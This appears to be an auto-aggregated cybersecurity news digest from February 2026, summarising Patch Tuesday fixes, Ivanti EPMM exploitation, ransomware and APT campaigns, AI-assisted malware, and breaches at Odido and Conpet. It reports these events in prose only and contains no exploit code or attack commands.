News Summary

Last updated: 18:30 12/02/2026 UTC
  • Microsoft September 2025 Patch Tuesday addresses 81 vulnerabilities, including two zero-days
    Microsoft's November 2025 Patch Tuesday addressed 63 vulnerabilities, including one actively exploited zero-day vulnerability (CVE-2025-62215), a critical Remote Code Execution flaw (CVE-2025-60724), and several other notable vulnerabilities. The updates also included fixes for multiple elevation of privilege, remote code execution, information disclosure, denial-of-service, and spoofing vulnerabilities. Microsoft has released the first extended security update (ESU) for Windows 10, advising users to upgrade to Windows 11 or enroll in the ESU program. The KB5068781 update, the first Windows 10 extended security update since the operating system reached end of support on October 14, 2025, includes fixes for 63 flaws and one actively exploited elevation-of-privilege vulnerability. The September 2025 Patch Tuesday addressed 80 vulnerabilities, including 13 critical vulnerabilities. The updates fixed a range of issues, including privilege escalation, remote code execution, information disclosure, and denial-of-service vulnerabilities. The patches also covered a critical flaw in Azure Networking and addressed a new lateral movement technique dubbed BitLockMove. Additionally, security updates were released by multiple vendors, including Adobe, Cisco, Google, and others. The September 2025 update included 38 elevation of privilege (EoP) vulnerabilities. The two zero-day vulnerabilities were CVE-2025-55234 in Windows SMB Server and CVE-2024-21907 in Microsoft SQL Server. The SMB vulnerability was exploited through relay attacks, while the SQL Server flaw involved improper handling of exceptional conditions in Newtonsoft.Json. The updates also included hardening features for SMB Server to mitigate relay attacks, with recommendations for administrators to enable auditing to assess compatibility issues.
    The KB5065429 cumulative update for Windows 10 22H2 and 21H2 included fourteen fixes or changes, addressing unexpected UAC prompts and severe lag and stuttering issues with NDI streaming software. The update enabled auditing SMB client compatibility for SMB Server signing and SMB Server EPA, and included an opt-in feature for administrators to allow outbound network traffic from Windows 10 devices. In February 2026, Microsoft released updates to fix six actively exploited zero-day vulnerabilities, three of which have been publicly disclosed. These include CVE-2026-21510, CVE-2026-21513, CVE-2026-21514, CVE-2026-21519, CVE-2026-21525, and CVE-2026-21533. None of the actively exploited vulnerabilities are rated critical. In total, 25 CVEs disclosed by Microsoft were EoP, followed by remote code execution (12), spoofing (7), information disclosure (6), and security feature bypass (5). SAP also released 26 new security notes and one update to a previously released note, including critical vulnerabilities CVE-2026-0509 and CVE-2026-0488.
  • GPUGate Malware Campaign Targets IT Firms in Western Europe
    The GPUGate malware campaign, now linked to the AMOS infostealer, continues to evolve with increasingly sophisticated social engineering tactics, targeting macOS users through fake AI assistant ecosystems, GitHub repositories, and malvertising. A new campaign, ClawHavoc, exploits the OpenClaw and ClawHub AI assistant platform by poisoning its skill marketplace with malicious add-ons (e.g., crypto tools, productivity utilities) that deploy AMOS malware. This follows earlier waves using fake GitHub repositories, Google Ads, and ClickFix techniques to distribute AMOS and Odyssey stealers, which harvest credentials, crypto wallets, browser sessions, and system data. The campaign, active since at least April 2023, has expanded from traditional phishing and trojanized installers to abusing AI hype, supply-chain weaknesses, and trusted platforms (e.g., ChatGPT shared chats, Homebrew, LogMeIn). Threat actors, likely Russian-speaking, operate AMOS as a Malware-as-a-Service (MaaS), with stolen logs sold in underground markets to fuel account takeovers, fraud, and ransomware. The latest ClawHavoc campaign underscores the shift toward high-impact distribution channels where weak marketplace vetting enables large-scale infections. Organizations are advised to monitor for suspicious Terminal activity, inspect network egress for exfiltration, and educate users on ClickFix-style social engineering and unverified AI tool extensions.
  • Aisuru botnet conducts record-breaking DDoS attacks, targeting U.S. ISPs and Microsoft Azure
    The Aisuru/Kimwolf botnet ecosystem continues to evolve, now disrupting critical anonymity infrastructure alongside its record-breaking DDoS campaigns. In February 2026, Kimwolf operators accidentally crippled the I2P anonymity network by attempting to onboard 700,000 infected devices as nodes, overwhelming the network's typical 15,000–20,000-device capacity and triggering a Sybil attack that halved I2P's functionality. This follows the botnet's 31.4 Tbps DDoS attack (November 2025) and holiday-themed "The Night Before Christmas" campaign (December 19, 2025), which peaked at 24 Tbps, 9 Bpps, and 205 Mrps, part of a 100% YoY increase in DDoS volume (47.1 million attacks mitigated in 2025). With over 6 million infected devices (1–4M IoT for Aisuru; >2M Android TVs/boxes for Kimwolf), the botnets blend hyper-volumetric DDoS with residential proxy monetization, targeting sectors beyond gaming to include telecom, IT, finance, AI, and now anonymity networks. The January 2026 takedown of IPIDEA, a key proxy enabler, reduced millions of exit nodes, but persistent infections and new evasion tactics (e.g., I2P/Tor C2 experimentation, ENS-based domains) highlight the botnets' adaptive resilience. Despite internal operator conflicts reducing Kimwolf's scale by 600,000+ devices, the ecosystem remains a systemic risk to global internet stability, enterprise security, and privacy infrastructure.
  • State-Backed Hackers Abuse AI Models for Advanced Cyber Attacks
    Google's Threat Intelligence Group (GTIG) has identified new malware families that leverage artificial intelligence (AI) and large language models (LLMs) for dynamic self-modification during execution. These malware families, including PromptFlux, PromptSteal, FruitShell, QuietVault, and PromptLock, demonstrate advanced capabilities for evading detection and maintaining persistence. PromptFlux, an experimental VBScript dropper, uses Google's LLM Gemini to generate obfuscated VBScript variants and evade antivirus software. It attempts persistence via Startup folder entries and spreads laterally on removable drives and mapped network shares. The malware appears to be in a development or testing phase and is assessed to be financially motivated. PromptSteal is a data miner written in Python that queries the LLM Qwen2.5-Coder-32B-Instruct to generate one-line Windows commands to collect information and documents in specific folders and send the data to a command-and-control (C2) server. It is used by the Russian state-sponsored actor APT28 in attacks targeting Ukraine. State-backed hackers from China (APT31, Temp.HEX), Iran (APT42), North Korea (UNC2970), and Russia have used Gemini AI for all stages of an attack, including reconnaissance, phishing lure creation, C2 development, and data exfiltration. Chinese threat actors used Gemini to automate vulnerability analysis and provide targeted testing plans against specific US-based targets. Iranian adversary APT42 leveraged Gemini for social engineering campaigns and to speed up the creation of tailored malicious tools. The use of AI in malware enables adversaries to create more versatile and adaptive threats, posing significant challenges for cybersecurity defenses.
    The underground market for AI-powered cybercrime tools is also growing, with offerings ranging from deepfake generation to malware development and vulnerability exploitation.
  • Microsoft October 2025 Patch Tuesday fixes 6 zero-days, 183 flaws
    Microsoft's October 2025 Patch Tuesday marked the end of free security updates for Windows 10, addressing 183 vulnerabilities, including six zero-days, with the final cumulative update KB5066791. The update also introduced critical fixes for components like Windows SMB Server, Microsoft SQL Server, and Remote Access Connection Manager, alongside third-party vulnerabilities in AMD EPYC processors and IGEL OS. Separately, the February 2026 Patch Tuesday update fixed CVE-2026-20841, a high-severity remote code execution flaw in Windows 11 Notepad that allowed attackers to execute arbitrary programs via malicious Markdown links without security warnings. The flaw, affecting Notepad versions 11.2510 and earlier, stemmed from improper command neutralization that let Notepad launch unverified protocols (e.g., `file://`, `ms-appinstaller://`). Microsoft mitigated the risk by adding execution warnings for non-HTTP(S) URIs, with updates distributed automatically via the Microsoft Store. Prior milestones included out-of-band patches for a critical WSUS vulnerability (CVE-2025-59287) with public exploit code, smart card authentication issues caused by cryptographic service changes, and a RasMan zero-day (DoS vulnerability) affecting all Windows versions. Windows 10 reached end-of-life, with Extended Security Updates (ESU) available for purchase, while Exchange Server 2016/2019 and Skype for Business 2016 also ended support. The October 2025 update remains the largest on record, with 183 CVEs pushing Microsoft's annual vulnerability count past 1,021.
  • Lazarus Group Expands Operations with AI-Generated Video, Malware, and Malicious Packages in Cryptocurrency and Defense Sectors
    The Lazarus Group, a North Korea-linked threat actor, has expanded its operations to target European defense companies in 2025, leveraging a coordinated Operation DreamJob campaign. The attack involved fake recruitment lures and the deployment of various malware, including the ScoringMathTea RAT. This campaign follows earlier attacks on a decentralized finance (DeFi) organization in 2024, where the group deployed multiple cross-platform malware variants, including PondRAT, ThemeForestRAT, and RemotePE. In 2026, North Korean hackers have been observed using AI-generated video and the ClickFix technique to deliver malware for macOS and Windows to targets in the cryptocurrency sector. The threat actor's goal is financial, as suggested by the role of the tools used in an attack on a fintech company investigated by Google's Mandiant researchers. The attack had a strong social engineering component, with the victim being contacted over Telegram from a compromised executive account. The hackers used a Calendly link to a spoofed Zoom meeting page and showed a deepfake video of a CEO to facilitate the attack. Mandiant researchers found seven distinct macOS malware families attributed to UNC1069, a threat group they've been tracking since 2018. UNC1069 has been active since at least April 2018 and is also tracked under the monikers CryptoCore and MASAN. The group has used generative AI tools like Gemini to produce lure material and other messaging related to cryptocurrency. They have attempted to misuse Gemini to develop code to steal cryptocurrency and have leveraged deepfake images and video lures mimicking individuals in the cryptocurrency industry.
    The group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry since at least 2023, targeting centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds. In the latest intrusion documented by Google's threat intelligence division, UNC1069 deployed as many as seven unique malware families, including several new malware families such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH. The attack involved a social engineering scheme using a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim. The group used a fake website masquerading as Zoom to deceive victims and reused videos of previous victims to deceive new victims. The attack proceeded with a ClickFix-style troubleshooting command to deliver malware, leading to the deployment of various malicious components designed to gather system information, provide hands-on keyboard access, and steal sensitive data. Additionally, the Lazarus Group has been active since May 2025 with a campaign codenamed graphalgo, involving malicious packages in npm and PyPI repositories. Developers are targeted via social platforms like LinkedIn, Facebook, and Reddit. The campaign includes a fake company named Veltrix Capital in the blockchain and cryptocurrency trading space. Malicious packages are used to deploy a remote access trojan (RAT) that fetches and executes commands from an external server. The RAT supports commands to gather system information, enumerate files and directories, list running processes, create folders, rename files, delete files, and upload/download files. The command-and-control (C2) communication is protected by a token-based mechanism. The campaign checks for the MetaMask browser extension, indicating a focus on cryptocurrency theft.
    A malicious npm package called "duer-js" was found to harbor a Windows information stealer called Bada Stealer, capable of gathering Discord tokens, passwords, cookies, autofill data, cryptocurrency wallet details, and system information. Another malware campaign weaponizes npm to extort cryptocurrency payments from developers during package installation, blocking installation until victims pay 0.1 USDC/ETH to the attacker's wallet.
  • Exploitation of Ivanti EPMM Vulnerabilities (CVE-2025-4427, CVE-2025-4428) Leads to Malware Deployment
    Two malware strains were discovered in an organization's network after attackers exploited two zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM). The vulnerabilities, CVE-2025-4427 and CVE-2025-4428, allow for authentication bypass and remote code execution, respectively. Attackers used these flaws to gain access to the EPMM server, execute arbitrary code, and maintain persistence. The attack began around May 15, 2025, following the publication of a proof-of-concept exploit. The malware sets include loaders that enable arbitrary code execution and data exfiltration. The vulnerabilities affect Ivanti EPMM development branches 11.12.0.4, 12.3.0.1, 12.4.0.1, and 12.5.0.0 and their earlier releases. A China-nexus espionage group has been leveraging the vulnerabilities since at least May 15, 2025. The threat actor targeted the /mifs/rs/api/v2/ endpoint with HTTP GET requests and used the ?format= parameter to send malicious remote commands. The malware sets include distinct loaders with the same name, and malicious listeners that allow injecting and running arbitrary code on the compromised system. The threat actor delivered the malware through separate HTTP GET requests in segmented, Base64-encoded chunks. Organizations are advised to update their EPMM instances, monitor for suspicious activity, and implement access restrictions to prevent unauthorized access to mobile device management systems. Ivanti has disclosed two additional critical vulnerabilities, CVE-2026-1281 and CVE-2026-1340, which were exploited in zero-day attacks. These code-injection vulnerabilities allow remote attackers to execute arbitrary code on vulnerable devices without authentication. Ivanti has released RPM scripts to mitigate the vulnerabilities and advises applying them as soon as possible.
    The vulnerabilities will be permanently fixed in EPMM version 12.8.0.0, scheduled for release later in Q1 2026. CISA has added CVE-2026-1281 to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation. The vulnerabilities affect EPMM versions 12.5.0.0 and prior, 12.6.0.0 and prior, and 12.7.0.0 and prior (fixed in RPM 12.x.0.x), and EPMM 12.5.1.0 and prior and 12.6.1.0 and prior (fixed in RPM 12.x.1.x). The RPM patch does not survive a version upgrade and must be reapplied if the appliance is upgraded to a new version. The vulnerabilities affect the In-House Application Distribution and the Android File Transfer Configuration features and do not affect other products, including Ivanti Neurons for MDM, Ivanti Endpoint Manager (EPM), or Ivanti Sentry. Successful exploitation of the EPMM appliance will enable arbitrary code execution on the appliance and allow lateral movement to the connected environment. EPMM contains sensitive information about devices managed by the appliance. Legitimate use of the capabilities will result in 200 HTTP response codes in the Apache Access Log, whereas successful or attempted exploitation will cause 404 HTTP response codes. Customers are advised to review EPMM administrators for new or recently changed administrators, authentication configuration, new push applications for mobile devices, configuration changes to applications, new or recently modified policies, and network configuration changes. In the event of compromise, users are advised to restore the EPMM device from a known good backup or build a replacement EPMM and then migrate data to the device. After restoring, users should reset the password of any local EPMM accounts, reset the password for the LDAP and/or KDC service accounts, revoke and replace the public certificate used for EPMM, and reset the password for any other internal or external service accounts configured with the EPMM solution.
    The Dutch Data Protection Authority (AP) and the Council for the Judiciary confirmed that their systems were impacted by cyber attacks exploiting Ivanti EPMM vulnerabilities. Work-related data of AP employees, including names, business email addresses, and telephone numbers, were accessed by unauthorized persons. The European Commission identified traces of a cyber attack that may have resulted in access to names and mobile numbers of some of its staff members. Finland's state information and communications technology provider, Valtori, disclosed a breach that exposed work-related details of up to 50,000 government employees. The attacker gained access to information used in operating the service, including names, work email addresses, phone numbers, and device details. Investigations showed that the management system did not permanently delete removed data but only marked it as deleted, potentially compromising device and user data belonging to all organizations that have used the service during its lifecycle. The European Commission's central infrastructure managing mobile devices discovered signs of a breach on January 30, 2026, which may have resulted in access to staff names and mobile numbers. The Dutch justice and security secretary confirmed that the Council for the Judiciary (Rvdr) and the Dutch Data Protection Authority (AP) were breached, with unauthorized access to work-related data of AP employees, including names, business email addresses, and telephone numbers. Finnish government ICT center Valtori discovered a breach on January 30, 2026, affecting its mobile device management service, potentially exposing details of up to 50,000 government workers. Ivanti released patches for two critical (CVSS 9.8) zero-day bugs in EPMM on January 29, 2026, noting that a very limited number of customers had been exploited at the time of disclosure.
    CVE-2026-1281 and CVE-2026-1340 are code injection flaws that could allow attackers to achieve unauthenticated remote code execution. A significant share of the exploitation attempts targeting a newly disclosed security flaw in Ivanti Endpoint Manager Mobile (EPMM) can be traced back to a single IP address on bulletproof hosting infrastructure offered by PROSPERO. GreyNoise recorded 417 exploitation sessions from 8 unique source IP addresses between February 1 and 9, 2026, with 83% originating from 193.24.123[.]42. The same IP address exploited three other CVEs across unrelated software, indicating the use of automated tooling. 85% of the exploitation sessions beaconed home via DNS to confirm target exploitability without deploying malware or exfiltrating data. PROSPERO is linked to another autonomous system called Proton66, which has a history of distributing desktop and Android malware. Defused Cyber reported a "sleeper shell" campaign that deployed a dormant in-memory Java class loader to compromised EPMM instances, indicative of initial access broker tradecraft. Organizations are advised to apply patches, audit internet-facing MDM infrastructure, review DNS logs for OAST-pattern callbacks, monitor for the /mifs/403.jsp path on EPMM instances, and block PROSPERO's autonomous system (AS200593) at the network perimeter level.
Last updated: 16:45 12/02/2026 UTC
  • Warlock Ransomware Exploits Vulnerable SharePoint Servers
    Warlock ransomware, potentially linked to Black Basta, targets unpatched on-premises Microsoft SharePoint servers. The ransomware leverages multiple vulnerabilities (CVE-2025-49706, CVE-2025-49704, CVE-2025-53770, CVE-2025-53771) to gain initial access, escalate privileges, and deploy ransomware. The campaign includes extensive reconnaissance and evasion techniques, targeting security software to avoid detection. The threat actor Storm-2603, associated with China-backed groups, has been observed using Warlock ransomware in these attacks. The ransomware gang recently auctioned files stolen from Colt Technology Services, confirming customer data was compromised. Organizations are urged to apply available patches and implement comprehensive security measures to mitigate the risk. The ToolShell exploit chain, involving CVE-2025-53770 and CVE-2025-53771, was first publicly disclosed in mid-July 2025. Chinese-based threat groups Linen Typhoon and Violet Typhoon have been actively targeting SharePoint vulnerabilities since July 2025. Active exploitation of ToolShell vulnerabilities was first observed on July 18, 2025, a day before Microsoft's emergency advisory. Cisco Talos reported that nearly all their incident response engagements related to ToolShell activity began within 10 days of the vulnerabilities being disclosed. Network segmentation is crucial to prevent lateral movement within an organization following a ToolShell exploit. Recently, SmarterTools fell victim to a ransomware attack through an unpatched instance of its SmarterMail email server. The incident occurred on January 29 and impacted the company's office network and a data center hosting quality control testing systems, SmarterTools' portal, and its Hosted SmarterTrack network. The attack was perpetrated by the Warlock ransomware group, which is believed to be operating out of China.
    The hackers likely exploited CVE-2026-24423, an unauthenticated remote code execution (RCE) vulnerability that was patched on January 15. Customers are advised to update to the latest version of SmarterMail as soon as possible.
  • VoidLink Malware Framework Targets Cloud and Container Environments
    VoidLink is a Linux-based command-and-control (C2) framework capable of long-term intrusion across cloud and enterprise environments. The malware generates implant binaries designed for credential theft, data exfiltration, and stealthy persistence on compromised systems. VoidLink combines multi-cloud targeting with container and kernel awareness in a single Linux implant, fingerprinting environments across major cloud providers and adjusting its behavior based on what it finds. The implant harvests credentials from environment variables, configuration files, and metadata APIs, and profiles security controls, kernel versions, and container runtimes before activating additional modules. VoidLink employs a modular plugin-based architecture that loads functionality as needed, including credential harvesting, environment fingerprinting, container escape, Kubernetes privilege escalation, and kernel-level stealth. The malware uses AES-256-GCM over HTTPS for encrypted C2 traffic, designed to resemble normal web activity. VoidLink stands out for its apparent development using a large language model (LLM) coding agent with limited human review, as indicated by unusual development artifacts such as structured "Phase X:" labels, verbose debug logs, and documentation left inside the production binary. The research concludes that VoidLink is not a proof-of-concept but an operational implant with live infrastructure, highlighting how AI-assisted development is lowering the barrier to producing functional, modular, and hard-to-detect malware.
  • Velociraptor DFIR Tool Abused in LockBit and Babuk Ransomware Campaigns
    Threat actors, assessed to be China-based Storm-2603, have started using the Velociraptor digital forensics and incident response (DFIR) tool in ransomware attacks deploying LockBit and Babuk ransomware. The attackers exploited a privilege escalation vulnerability in an outdated version of Velociraptor to gain persistent access and control over virtual machines. The campaign involved creating local admin accounts, disabling security features, and using fileless PowerShell encryptors for data exfiltration and encryption. The ransomware deployed on Windows systems was identified as LockBit, while a Linux binary detected as Babuk ransomware was found on VMware ESXi systems. Storm-2603 initially exploited SharePoint vulnerabilities in July 2025 and deployed Warlock, LockBit, and Babuk ransomware on VMware ESXi servers in August 2025. Sophos CTU researchers first documented Velociraptor abuse by Storm-2603 on August 5, 2025. Storm-2603 used the ToolShell exploit to gain initial access and deployed an outdated version of Velociraptor (version 0.73.4.0) that is susceptible to a privilege escalation vulnerability (CVE-2025-6264) to enable arbitrary command execution and endpoint takeover. The group also used Smbexec to remotely launch programs using the SMB protocol and modified Active Directory (AD) Group Policy Objects (GPOs) to disable real-time protection. Storm-2603 established the infrastructure for the AK47 C2 framework in March 2025 and created the first prototype of the tool the next month. The group pivoted from LockBit-only deployment to dual LockBit/Warlock deployment in April 2025 and used the ToolShell exploit as a zero-day in July 2025. Storm-2603 demonstrated operational flexibility and sophisticated builder expertise using leaked and open-source ransomware frameworks.
    In a recent breach, SmarterTools confirmed that the Warlock ransomware gang breached its network on January 29, 2026, via a single SmarterMail virtual machine (VM) set up by an employee. The vulnerability exploited in the attack to gain access is CVE-2026-23760, an authentication bypass flaw in SmarterMail before Build 9518, which allows resetting administrator passwords and obtaining full privileges. The attackers moved laterally from that one vulnerable VM via Active Directory, using Windows-centric tooling and persistence methods. The ransomware operators waited roughly a week after gaining initial access, the final stage being encryption of all reachable machines. SentinelOne security products reportedly stopped the final payload from performing encryption, the impacted systems were isolated, and data was restored from fresh backups. Tools used in the attacks include Velociraptor, SimpleHelp, and vulnerable versions of WinRAR, while startup items and scheduled tasks were also used for persistence. ReliaQuest reported that Storm-2603 chains CVE-2026-23760 access with the software's built-in 'Volume Mount' feature to gain full system control. ReliaQuest also saw probes for CVE-2026-24423, another SmarterMail flaw flagged by CISA as actively exploited by ransomware actors, although the primary vector was CVE-2026-23760.
  • Transparent Tribe Targets Indian Government with Dual-Platform Malware Campaign
    APT36, also known as Transparent Tribe, is targeting both Windows and BOSS Linux systems in ongoing attacks against Indian government and defense entities. The campaign, active since June 2025, involves phishing emails delivering malicious .desktop files disguised as PDFs. The malware facilitates data exfiltration, persistent espionage access, and includes anti-debugging and anti-sandbox checks. The malware also targets the Kavach 2FA solution used by Indian government agencies. The attack leverages the .desktop file's 'Exec=' field to execute a sequence of shell commands that download and run a Go-based ELF payload. The payload establishes persistence through cron jobs and systemd services, and communicates with a C2 server via a WebSocket channel. The technique allows APT36 to evade detection by abusing a legitimate Linux feature that is not typically monitored for threats. The campaign demonstrates APT36's evolving tactics, becoming more evasive and sophisticated. The campaign uses dedicated staging servers for malware distribution, transitioning from cloud storage platforms. The malware includes multiple persistence methods and supports commands for file browsing, collection, and remote execution. The campaign is part of a broader pattern of targeted activity by South and East Asian threat actors, reflecting a trend toward purpose-built malware and infrastructure. Indian government entities have been targeted in two campaigns codenamed Gopher Strike and Sheet Attack. Gopher Strike leveraged phishing emails to deliver PDF documents with a blurred image and a fake Adobe Acrobat Reader DC update dialog. The campaign uses server-side checks to prevent automated URL analysis tools from fetching the ISO file, ensuring delivery only to intended targets in India.
    The malicious payload is a Golang-based downloader called GOGITTER, which creates a VBScript file to fetch commands from C2 servers. GOGITTER sets up persistence using a scheduled task to run the VBScript file every 50 minutes. GOGITTER downloads a ZIP file from a private GitHub repository and executes a lightweight Golang-based backdoor called GITSHELLPAD. GITSHELLPAD polls the C2 server every 15 seconds for commands and supports six different commands including cd, run, upload, and download. The results of command execution are stored in a file called "result.txt" and uploaded to the GitHub account. The threat actor also downloads RAR archives containing utilities to gather system information and drop GOSHELL, a bespoke Golang-based loader. GOSHELL's size was artificially inflated to approximately 1 gigabyte to evade detection by antivirus software. GOSHELL only executes on specific hostnames by comparing the victim's hostname against a hard-coded list. APT36 and SideCopy are launching cross-platform RAT campaigns against Indian entities using malware families like Geta RAT, Ares RAT, and DeskRAT. The campaigns use phishing emails with malicious attachments or download links to deliver the malware, which provides persistent remote access, system reconnaissance, data collection, and command execution. Geta RAT supports various commands including system information collection, process enumeration, credential gathering, and file operations. Ares RAT is a Python-based RAT that can run commands issued by the threat actor. DeskRAT is delivered via a rogue PowerPoint Add-In file with embedded macros. The campaigns target Indian defense, government, and strategic sectors, demonstrating a well-resourced, espionage-focused threat actor deliberately targeting these sectors through defense-themed lures, impersonated official documents, and regionally trusted infrastructure.
  • State-Backed Hackers Abuse AI Models for Advanced Cyber Attacks Google's Threat Intelligence Group (GTIG) has identified new malware families that leverage artificial intelligence (AI) and large language models (LLMs) for dynamic self-modification during execution. These malware families, including PromptFlux, PromptSteal, FruitShell, QuietVault, and PromptLock, demonstrate advanced capabilities for evading detection and maintaining persistence. PromptFlux, an experimental VBScript dropper, uses Google's LLM Gemini to generate obfuscated VBScript variants and evade antivirus software. It attempts persistence via Startup folder entries and spreads laterally on removable drives and mapped network shares. The malware is in a development or testing phase and is assessed to be financially motivated. PromptSteal is a data miner written in Python that queries the LLM Qwen2.5-Coder-32B-Instruct to generate one-line Windows commands to collect information and documents in specific folders and send the data to a command-and-control (C2) server. It is used by the Russian state-sponsored actor APT28 in attacks targeting Ukraine. State-backed hackers from China (APT31, Temp.HEX), Iran (APT42), North Korea (UNC2970), and Russia have used Gemini AI for all stages of an attack, including reconnaissance, phishing lure creation, C2 development, and data exfiltration. Chinese threat actors used Gemini to automate vulnerability analysis and provide targeted testing plans against specific US-based targets. Iranian adversary APT42 leveraged Gemini for social engineering campaigns and to speed up the creation of tailored malicious tools. The use of AI in malware enables adversaries to create more versatile and adaptive threats, posing significant challenges for cybersecurity defenses. Various threat actors, including those from China, Iran, and North Korea, have been observed abusing AI models like Gemini across different stages of the attack lifecycle. 
The underground market for AI-powered cybercrime tools is also growing, with offerings ranging from deepfake generation to malware development and vulnerability exploitation.
  • Pro-Russia Hacktivists Target Critical Infrastructure with Low-Sophistication Attacks Pro-Russia hacktivist groups are conducting opportunistic, low-sophistication cyberattacks against U.S., UK, and global critical infrastructure. These attacks target a wide range of sectors, including water treatment facilities, food production, energy systems, and local government bodies, using easily repeatable methods. The groups exploit minimally secured, internet-facing virtual network computing (VNC) connections to gain unauthorized access to operational technology (OT) control devices. The joint advisory from CISA, FBI, NSA, and global partners, along with a recent warning from the UK National Cyber Security Centre (NCSC), urges immediate action to mitigate these threats. The advisory highlights the use of basic methods to target supervisory control and data acquisition (SCADA) networks, sometimes combined with DDoS attacks. The cumulative impact of these activities poses a persistent and disruptive threat to essential services. According to a new report, groups such as Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16), and Sector16 are using simple reconnaissance tools and common password-guessing techniques to reach internet-facing human-machine interfaces. The activity of these groups has caused physical impacts in some cases, including temporary loss of view and costly manual recovery efforts. The NCSC warns of continued malicious activity from Russian-aligned hacktivist groups targeting critical infrastructure and local government organizations in the UK with disruptive denial-of-service (DDoS) attacks. The NCSC notes that NoName057(16) operates the DDoSia project, a platform that allows volunteers to contribute computing resources to carry out crowdsourced DDoS attacks and receive monetary rewards or recognition from the community. 
Operation Eastwood disrupted NoName057(16)'s activity in mid-July 2025 by arresting two members of the group, issuing eight arrest warrants, and taking down 100 servers. Despite these efforts, the group has returned to action, highlighting the evolving threat they pose. Recent developments indicate that attackers are growing more interested in and accustomed to dealing with industrial machines, potentially leading to more sophisticated OT attacks. Ric Derbyshire, principal security engineer at Orange Cyberdefense, will demonstrate 'living-off-the-plant' attacks at the RSA Conference 2026, which require a holistic understanding of the physical process, OT systems, network architecture, security controls, and human interactions.
  • North Korea-Linked UNC1069 Targets Cryptocurrency Sector with AI-Generated Video and Malware The Lazarus Group, a North Korea-linked threat actor, has expanded its operations to target European defense companies in 2025, leveraging a coordinated Operation DreamJob campaign. The attack involved fake recruitment lures and the deployment of various malware, including the ScoringMathTea RAT. This campaign follows earlier attacks on a decentralized finance (DeFi) organization in 2024, where the group deployed multiple cross-platform malware variants, including PondRAT, ThemeForestRAT, and RemotePE. In 2026, North Korean hackers have been observed using AI-generated video and the ClickFix technique to deliver malware for macOS and Windows to targets in the cryptocurrency sector. The threat actor's goal is financial, as suggested by the role of the tools used in an attack on a fintech company investigated by Google's Mandiant researchers. The attack had a strong social engineering component, with the victim being contacted over Telegram from a compromised executive account. The hackers used a Calendly link to a spoofed Zoom meeting page and showed a deepfake video of a CEO to facilitate the attack. Mandiant researchers found seven distinct macOS malware families attributed to UNC1069, a threat group they've been tracking since 2018. UNC1069 has been active since at least April 2018 and is also tracked under the monikers CryptoCore and MASAN. The group has used generative AI tools like Gemini to produce lure material and other messaging related to cryptocurrency. They have attempted to misuse Gemini to develop code to steal cryptocurrency and have leveraged deepfake images and video lures mimicking individuals in the cryptocurrency industry. 
The group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry since at least 2023, targeting centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds. In the latest intrusion documented by Google's threat intelligence division, UNC1069 deployed as many as seven unique malware families, including several new malware families such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH. The attack involved a social engineering scheme using a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim. The group used a fake website masquerading as Zoom to deceive victims and reused videos of previous victims to deceive new victims. The attack proceeded with a ClickFix-style troubleshooting command to deliver malware, leading to the deployment of various malicious components designed to gather system information, provide hands-on keyboard access, and steal sensitive data.

Latest updates

Qilin ransomware group targets multiple organizations, including South Korean financial sector and Romanian oil pipeline operator Conpet

Updated: 12.02.2026 21:16 · First: 19.08.2025 17:25 · 📰 20 src / 24 articles

The Qilin ransomware group has confirmed the theft of nearly **1TB of data** from **Conpet S.A.**, Romania’s national oil pipeline operator, following a cyberattack on February 5, 2026. While the company’s **operational technologies (SCADA and telecommunications) remained unaffected**, the breach compromised corporate IT systems, exposing internal documents—including financial records and passport scans—some dated as recently as **November 2025**. Conpet has warned of potential fraud risks stemming from the stolen data and is working with Romania’s **National Cyber Security Directorate (DNSC)** to investigate the incident. This attack is part of Qilin’s broader 2025–2026 campaign, which has targeted high-profile victims across **62 countries**, including **Asahi Group (Japan)**, **Mecklenburg County Public Schools (U.S.)**, **Creative Box Inc. (Nissan subsidiary)**, and **Synnovis (UK pathology provider)**. The group employs **hybrid tactics**, such as abusing **Windows Subsystem for Linux (WSL)** to deploy Linux encryptors on Windows systems, **BYOVD (Bring Your Own Vulnerable Driver) exploits**, and **supply-chain compromises via Managed Service Providers (MSPs)**. Qilin’s **double-extortion model**—combining encryption with data leaks—has disrupted critical infrastructure, manufacturing, and financial sectors, with **over 700 confirmed victims in 2025 alone**. Recent developments include **politically charged leaks in South Korea** and **collaborations with affiliates like Scattered Spider**, underscoring the group’s evolving threat to global cybersecurity.

Odido Data Breach Exposes 6.2 Million Customer Records

Updated: · First: 12.02.2026 20:18 · 📰 1 src / 1 articles

Dutch telecommunications provider Odido suffered a cyberattack that exposed personal data of 6.2 million customers. The breach occurred in their customer contact system, but no passwords, call logs, or billing information were affected. The company detected the incident on February 7 and has since taken steps to secure their systems and notify affected customers. The exposed data includes full names, addresses, mobile numbers, customer numbers, email addresses, IBANs, dates of birth, and identification data. Odido has reported the breach to the Dutch Data Protection Authority and is working with external cybersecurity experts to mitigate the incident.

Critical RCE vulnerability in WPvivid Backup & Migration plugin

Updated: · First: 12.02.2026 19:09 · 📰 1 src / 1 articles

A critical remote code execution (RCE) vulnerability (CVE-2026-1357) in the WPvivid Backup & Migration plugin for WordPress, installed on over 900,000 websites, allows unauthenticated attackers to upload arbitrary files. The flaw, rated 9.8 in severity, affects versions up to 0.9.123 and can lead to complete website takeover. The vulnerability stems from improper error handling in RSA decryption and lack of path sanitization, enabling directory traversal and malicious PHP file uploads. Exploitation is constrained by a 24-hour exploitation window and requires the 'receive backup from another site' option to be enabled. A patch (version 0.9.124) was released on January 28, 2026, addressing the flaw by improving error handling, filename sanitization, and restricting uploads to specific file types.

Lazarus Group Expands Operations with AI-Generated Video, Malware, and Malicious Packages in Cryptocurrency and Defense Sectors

Updated: 12.02.2026 18:55 · First: 02.09.2025 19:39 · 📰 10 src / 13 articles

